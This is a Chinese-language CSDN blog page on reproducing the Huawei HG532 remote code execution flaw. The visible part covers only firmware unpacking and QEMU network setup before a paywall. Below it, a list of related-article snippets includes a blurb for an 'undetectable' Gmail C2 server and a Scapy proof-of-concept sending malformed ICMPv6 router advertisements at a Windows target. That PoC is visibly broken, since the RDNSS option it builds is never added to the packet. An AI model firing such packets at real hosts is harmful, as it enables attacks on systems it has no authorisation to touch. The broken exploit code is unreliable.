路由器漏洞复现详细分析

于 2025-02-08 03:00:00 发布
阅读量1k 收藏 11
点赞数 19
文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Libao657/article/details/145155019
版权

漏洞描述在这里插入图片描述
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.

华为 HG532 部分定制版本存在远程代码执行漏洞。经过身份验证的攻击者可以向端口 37215 发送恶意数据包以发起攻击。成功利用此漏洞可导致远程执行任意代码.

没有漏洞的具体位置 我们先解包然后进行分析

环境搭建
固件下载:

通过网盘分享的文件:router HG532e.rar 链接: https://pan.baidu.com/s/1e4UXib76bnNlMz4gBl6sjw 提取码: sn0w

binwalk -Me HG532eV100R001C01B020_upgrade_packet.bin

在这里插入图片描述
下载qemu启动虚拟机所需要的“镜像” 这里采用的是内核态模拟

wget https://people.debian.org/~aurel32/qemu/mips/debian_squeeze_mips_standard.qcow2
wget https://people.debian.org/~aurel32/qemu/mips/vmlinux-2.6.32-5-4kc-malta
创建虚拟网桥,实现虚拟机内部和Ubuntu的连接

sudo apt-get install bridge-utils
sudo brctl addbr Virbr0
sudo ifconfig Virbr0 192.168.153.1/24 up在这里插入图片描述
创建tap0接口 并添加网桥

sudo tunctl -t tap0
sudo ifconfig tap0 192.168.153.11/24 up
sudo brctl addif Virbr0 tap0在这里插入图片描述
写一个启动脚本start.sh

#!/bin/bash

sudo qemu-system-mips \
-M malta \
-kernel vmlinux-2.6.32-5-4kc-malta \
-hda debian_squeeze_mips_standard.qcow2 \
-append “root=/dev/sda1 console=tty0” \
-netdev tap,id=tap

最低0.47元/天 解锁文章
华为HG532系列路由器命令注入漏洞分析 CVE-2017-17215
afei001
11-02 1728
这是afei入门IOT安全复现的第一个漏洞。在此之前通过黑盒已经get到了某路由器的一枚RCE,但我想了解漏洞原理,于是就来学习了,之前看了腹黑、孙爱民师傅的IOT漏洞挖掘的分享,学到了很多,希望这篇文章也能带领大家入门IOT安全。
华为HG532系列路由器命令注入漏洞复现 CVE-2017-17215
afei001
11-02 1249
华为HG532系列路由器是一款为家庭和小型办公用户打造的高速无线路由器产品。2017年11月27日Check Point团队报告华为HG532产品的远程命令执行漏洞(CVE-2017-17215)。通过认证的攻击者可以向37215端口发送恶意报文进行攻击。成功的利用可能导致远程执行任意代码。据vuldb描述,该漏洞被作为一个非公开的零日漏洞处理了至少85天。
华为家用路由器CVE漏洞复现(CVE-2017-17215)
weixin_45904478的博客
01-20 1078
因工作原因,需要复现一下华为家用路由器HG532的远程RCE漏洞,但是参考网上教程操作时踩了一些坑,所以记录一下复现成功的全部过程。
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 7602
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
记一次华为HG532固件模拟
神使墨丘利的博客
05-23 923
需要注意的是,此时设备的ip地址已经发生了更改,我们在虚拟机中使用ifconfig查看网卡状态,发现之前配置的ip地址没有了,这是由于有些设备在启动的过程中,会自动将之前的一些ip配置信息删除掉。因此,设备启动后,仍然需要手动配置一下ip。这里不直接在虚拟机中登录虚拟机,而在主机上使用ssh登录虚拟机,原因在于虚拟机在启动路由器的过程中,会更改之前配置的ip地址,导致网页无法访问的情况。使用一个可执行文件的目的在于不用每次都输入一大串的命令,只需要每次使用./执行该文件即可进行相应的配置。
通杀漏洞华为、TP_Link、360、小米等多款主流路由器沦陷
互联网安全研究院
05-28 1023
因此,针对TCP的劫持攻击可以应用于多种场景。首先,攻击者发送伪造的TCP RST报文来清除受害者连接的路由器 NAT 映射,由于大多数路由器出于性能考虑而不会严格检查TCP报文的序列号,然而,这也引入了严重的安全漏洞。目前,已有七家路由器供应商( TP-Link、华为、小米、360、Mercury、Ubiquiti 、Linksys)都已承认该漏洞,并正在尝试修复他们的产品。路由器作为连接智能设备和互联网的桥梁,承担着数据来往的主要任务,如果遭到黑客的攻击,企业和个人的数据安全问题就无法保障。
复现华为HG532远程注入漏洞(CVE-2017-17215)手把手带你复现 新手必看
qq_66444569的博客
01-16 1022
漏洞名称HUAWEI 远程代码执行漏洞(CVE-2017-17215)漏洞编号漏洞类型远程代码执行威胁等级高危漏洞详情华为 HG532 部分定制版本存在远程代码执行漏洞。经过身份验证的攻击者可以向端口 37215 发送恶意数据包以发起攻击。成功利用此漏洞可导致远程执行任意代码影响范围。
我用一个例子疏通“路由器漏洞&复现”【建议收藏!!】
kali_Ma的博客
07-04 982
一、介绍 ​ 该缺陷存在于Cisco IOS XR软件的Cisco Discovery Protocol中,它可能导致黑客的攻击。 ​ “该漏洞是Cisco Discovery Protocol中字段字符串输入的错误验证所致。黑客可以通过向受影响设备发送恶意Cisco Discovery Protocol数据包以利用漏洞。” “被成功利用的漏洞可能导致堆栈溢出,黑客便可以执行任意代码。” ​ Cisco专家指出,其他黑客也可以利用此缺陷。美国国家安全局(NSA)声称该漏洞漏洞排名中位居前25。 IOS .
飞鱼星路由器.htpasswd信息泄露漏洞分析与复现
12-21
通过对漏洞复现过程的详细描述,揭示了路由器管理后台的用户名和密码信息如何被非法获取。 适合人群:网络安全专业人士、漏洞研究者、IT安全管理人员。 使用场景及目标:①了解路由器常见漏洞及其危害;②掌握漏洞...
CVE-2019-19945漏洞复现 Openwrt针对uhttpd漏洞利用
weixin_51339377的博客
05-06 750
CVE-2019-19945漏洞原理和复现
HG532eV100R001C01B020_upgrade_packet.bin
08-07
个人用于CVE-2017-17215华为路由器漏洞固件 HG532eV100R001C01B020_upgrade_packet.bin 定制版的华为HG532具有远程执行代码漏洞。 经过身份验证的攻击者可以将恶意数据包发送到端口37215,以发起攻击。 成功的利用可能导致远程执行任意代码。
挖到华为的高危漏洞啦,3000奖励真不错
隔壁王叔的博客
07-19 1118
挖到华为的高危漏洞啦,3000奖励真不错
qemu虚拟机模拟固件环境搭建
weixin_52111404的博客
07-30 7792
qemu虚拟机模拟固件环境搭建并配置路由器漏洞分析环境
复现】CVE-2024-29269 某国外路由器RCE漏洞_72
fushuang333的博客
04-12 1249
复现】CVE-2024-29269 某国外路由器RCE漏洞,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1409
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
CVE-2017-17215(华为HG532远程命令执行漏洞)复现问题与解决方案
a5555678744的博客
09-29 1709
环境准备: qemu环境的准备: 可以看freebuf上大佬的博客 通过CVE-2017-17215学习路由器漏洞分析,从入坑到放弃 - FreeBuf网络安全行业门户d 注意事项: 1.最好就用Ubuntu16.04,不要问我为什么知道的,强上Ubuntu20.04留下的只有泪。 2.上面这一步中可能遇到qemu-ifup这个文件本身就存在的问题,建议备份之后删掉重写成博客中那个样子。 3.博客中从eth0切换到eth1的操作好像是必定要做的,但是我遇到了一个严重的问题,q.
华为路由器CVE-2017-17215-HG532
PMJ的博客
01-22 6036
华为路由器CVE-2017-17215-HG532 漏洞描述 官方 该远程命令执行漏洞是位于UPnP服务中的,该设备支持名为DeviceUpgrade的一种服务类型 设备可以通过这种服务更新固件,具体过程是向“/ctrlt/DeviceUpgrade_1”这个地址提交请求,请求中包含NewStatusURL及NewDownloadURL两个元素。远程管理员可以通过该漏洞在设备上执行任意命令 将shell元字符 注入NewStatusURL以及NewDownloadURL元素中。 分析漏洞 下载固件: ht
CVE-2017-17215 HG532e 远程命令执行漏洞分析
tigerOrtiger的博客
11-10 3798
CVE-2017-17215 HG532e 远程命令执行漏洞分析 0x01 前言 HG532e 是华为的一款无线路由器。 这个漏洞是由蜜罐捕获到payload 之后,才被checkpoint 披露出来的。 这都是好几年前的洞了,但是可以作为分析固件,模拟固件很好的学习例子。 接下来跟我一起来体验跑固件的乐趣吧 …QAQ happy hacking !!! 0x02 搭建固件模拟环境 首先固件模拟,需要现成的固件 下载链接 HG532e 下载不了可以留言给我。 固件模拟这里有两种方式: 一种是 利用现有
华为路由器 CVE 2017-17215 命令注入漏洞复现
weixin_44229639的博客
12-09 4457
华为路由器 CVE 2017-17215 命令注入漏洞复现
CVE-2020-24686 漏洞复现
最新发布
03-23
关于 CVE-2020-24686 漏洞,其主要影响的是 Windows TCP/IP 协议栈中的 ICMPv6 路由器广告处理部分。此漏洞源于对递归 DNS 服务器选项(Type 25)的不当解析,特别是当长度字段设置为偶数值时引发的缓冲区溢出问题[^4]。 以下是针对该漏洞复现所需的关键要素: ### 实验环境搭建 为了成功复现 CVE-2020-24686 漏洞,需准备如下实验环境: 1. **目标操作系统**: 需要运行受影响版本的 Windows 系统,具体包括但不限于 Windows 10 Version 20H2、Windows Server, version 20H2 (Server Core installation) 和其他受支持的操作系统版本。 2. **网络配置**: 设置一个测试网络环境,其中包含一台作为攻击者的机器以及另一台安装有易受攻击操作系统的主机。 3. **工具需求**: - Scapy 或者类似的 Python 库用于构建自定义的 ICMPv6 数据包。 - Wireshark 可选,用来捕获并分析流量以便验证发送的数据包结构是否正确。 ### POC 编写 下面是一个简单的基于 Scapy 的 PoC 示例脚本,它会向指定的目标设备发送恶意构造的 ICMPv6 Router Advertisement 包含非法长度值的 Type 25 Option: ```python from scapy.all import * def exploit(target_ip): eth = Ether(dst="ff:ff:ff:ff:ff:ff") # 广播MAC地址 ip6 = IPv6(src="::", dst=target_ip) icmp6_ra = ICMPv6ND_RA() rdnss_opt = ICMPv6NDOptRDNSS(length=2) # 使用不符合RFC标准的偶数长度 payload = "\x00" * ((rdnss_opt.length*8)-len(rdnss_opt.fields_desc)) + struct.pack("!Q", 0xdeadbeefcafebabe) packet = eth/ip6/icmp6_ra/Raw(load=payload) sendp(packet, iface="eth0") if __name__ == "__main__": target_ip = "fe80::xxxx:yyyy:zzzz:wwww" # 替换为目标的实际链路本地IPV6地址 exploit(target_ip) ``` 上述代码片段通过创建具有特定畸形参数的ICMPv6消息来触发潜在的安全风险。注意替换 `target_ip` 参数为你实际环境中受害节点的有效IPv6链接局部地址。 ### 注意事项 尽管提供了理论基础和技术细节供学习研究之用,在真实世界里实施此类行为违反法律和服务条款规定。仅限于授权范围内的渗透测试活动才允许尝试这些技术手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值